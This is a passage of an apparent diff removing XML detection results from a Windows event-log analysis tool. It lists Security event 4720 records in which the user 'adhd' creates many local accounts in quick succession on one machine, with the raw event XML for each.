Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lisa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lisa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5233</recordid>
-            <time>2020-06-11 22:05:10.1893600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.0018936Z'/&gt;&lt;EventRecordID&gt;5233&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mildred&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1198&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mildred&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mildred</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5227</recordid>
-            <time>2020-06-11 22:05:09.905376700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.9053767Z'/&gt;&lt;EventRecordID&gt;5227&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lauren&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1197&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lauren&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lauren</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5221</recordid>
-            <time>2020-06-11 22:05:09.806456500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.8064565Z'/&gt;&lt;EventRecordID&gt;5221&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Douglas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1196&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Douglas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Douglas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5215</recordid>
-            <time>2020-06-11 22:05:09.716380800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.7163808Z'/&gt;&lt;EventRecordID&gt;5215&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Roy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1195&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Roy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Roy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5209</recordid>
-            <time>2020-06-11 22:05:09.629194500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.6291945Z'/&gt;&lt;EventRecordID&gt;5209&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sarah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1194&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sarah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sarah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5203</recordid>
-            <time>2020-06-11 22:05:09.547178700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.5471787Z'/&gt;&lt;EventRecordID&gt;5203&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Julia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1193&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Julia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Julia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5197</recordid>
-            <time>2020-06-11 22:05:09.466490300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.4664903Z'/&gt;&lt;EventRecordID&gt;5197&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Peter&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1192&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Peter&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Peter</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5191</recordid>
-            <time>2020-06-11 22:05:09.363536900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.3635369Z'/&gt;&lt;EventRecordID&gt;5191&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Pamela&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1191&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Pamela&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Pamela</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5185</recordid>
-            <time>2020-06-11 22:05:09.282529400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.2825294Z'/&gt;&lt;EventRecordID&gt;5185&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Scott&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1190&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data 